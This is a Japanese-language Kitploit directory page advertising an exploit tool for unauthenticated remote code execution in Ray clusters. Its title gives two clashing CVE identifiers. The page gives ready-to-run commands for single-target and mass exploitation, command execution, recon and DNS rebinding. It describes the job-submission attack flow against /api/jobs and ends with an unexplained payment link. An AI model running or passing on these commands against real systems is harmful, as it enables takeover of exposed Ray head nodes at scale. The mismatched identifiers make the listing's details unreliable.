Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-33017 — CVE-2025-62593 — Ray Unauthenticated RCE Exploit は、Ray 分散 AI コンピュートエンジンにおける認証なしのリモートコード実行の脆弱性です。 | Kitploit
ツール/GitHubGitHub/maxprog-svg/cve-2026-33017
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用コマンド&コントロールリモートアクセストロイの木馬
GitHubmaxprog-svg/cve-2026-33017

CVE-2026-33017

CVE-2025-62593 — Ray Unauthenticated RCE Exploit は、Ray 分散 AI コンピュートエンジンにおける認証なしのリモートコード実行の脆弱性です。

リポジトリを見る
10時間10分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-62593 — Ray 未認証RCEエクスプロイト

概要

CVE-2025-62593 は、Ray分散AIコンピューティングエンジンにおける未認証のリモートコード実行の脆弱性です。 根本原因は、重要なHTTPエンドポイント(/api/jobs、/api/job_agent/jobs)における認証の欠如です。 攻撃者は、エントリポイントが任意のコマンドであるRayジョブを送信し、クラスタのヘッドノード上でそれを実行できます。

クイックスタート

root@kitploit:~
# 単一ターゲット
python3 ray_rce_poc.py --target http://HOST:8265

# 大量スキャン(10並行)
python3 ray_rce_poc.py --targets list.txt --command "id" -o results.json

# 偵察モード(クイック列挙)
python3 ray_rce_poc.py --recon --targets list.txt

# DNSリバインディングモード
python3 ray_rce_poc.py --dns-rebind --target http://HOST:8265 --rebind-host 10.0.0.1

# ワードリストスキャン
python3 ray_rce_poc.py --targets list.txt --wordlist commands.txt -o results.csv

機能

  • Asyncio並行処理 — 設定可能な並列度(デフォルト: 10)、1ターゲットと同じ時間で1000ターゲットをスキャン
  • リトライ+指数バックオフ — リクエストごとに3回のリトライ
  • プログレスバー+ETA — リアルタイムのASCIIプログレス表示
  • カラー出力 — ANSIカラー(✓/✗/○)
  • 3つの出力形式 — JSON / CSV / JSONL(拡張子から自動検出)
  • 偵察モード — ジョブを送信せずにクイック列挙
  • DNSリバインディングモード — 完全なRebindHTTPConnection実装
  • ワードリストモード — コマンドリストに対するスキャン
  • 標準ライブラリのみ — 外部依存関係なし、Python 3.8+

攻撃フロー

  1. ジョブの送信 — ターゲットコマンドを実行するエントリポイントでPOST /api/jobs/
  2. ステータスのポーリング — ジョブが終了状態に達するまでGET /api/jobs/
  3. ログの取得 — 出力を回収するためにGET /api/jobs/{id}/logs

https://satoshi-box.com/pay/CSIgNt

ツールをダウンロード